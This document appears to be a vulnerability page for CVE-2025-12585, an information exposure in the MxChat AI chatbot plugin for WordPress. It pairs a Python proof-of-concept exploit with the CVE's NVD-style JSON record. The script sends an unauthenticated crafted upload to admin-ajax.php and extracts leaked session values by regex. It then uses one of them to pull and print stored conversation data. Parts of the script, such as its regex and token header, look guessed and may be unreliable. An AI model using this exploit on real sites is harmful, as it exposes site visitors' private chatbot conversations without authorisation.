CVE-2025-12585

import requests import re # CVE-2025-12585 PoC - MxChat Sensitive Information Exposure # Target: WordPress site with MxChat plugin <= 2.5.5 target = "http://target-wordpress-site.com" # Step 1: Identify the vulnerable endpoint upload_url = f"{target}/wp-admin/admin-ajax.php" # Step 2: Extract session values from upload response headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "multipart/form-data" } # Step 3: Send crafted upload request to leak session values files = { "file": ("session_test.txt", b"test", "text/plain") } data = { "action": "mxchat_upload_file", "nonce": "" # Nonce may not be required for unauthenticated access } try: response = requests.post(upload_url, headers=headers, files=files, data=data, timeout=10) # Extract session values from response session_pattern = r'session[_"]*:?\s*["]?([a-zA-Z0-9_-]+)' matches = re.findall(session_pattern, response.text) if matches: print(f"[+] Leaked session values: {matches}") # Step 4: Use leaked session to access conversation data session_value = matches[0] conversation_url = f"{target}/wp-json/mxchat/v1/conversations" headers["X-Session-Token"] = session_value conv_response = requests.get(conversation_url, headers=headers) print(f"[+] Conversation data: {conv_response.text}") else: print("[-] No session values leaked") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2025-12585", "sourceIdentifier": "[email protected]", "published": "2025-12-03T04:15:59.650", "lastModified": "2026-04-22T20:16:31.220", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MxChat – AI Chatbot for WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.5 via upload filenames. This makes it possible for unauthenticated attackers to extract session values that can subsequently be used to access conversation data."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://github.com/d0n601/CVE-2025-12585", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/mxchat-basic/trunk/includes/class-mxchat-integrator.php#L107", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3406402%40mxchat-basic&new=3406402%40mxchat-basic&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-12585", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7cf1a90d-6157-40e7-aed8-4d18bc22432d?source=cve", "source": "[email protected]"}, {"url": "https://ryankozak.com/posts/cve-2025-12585/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}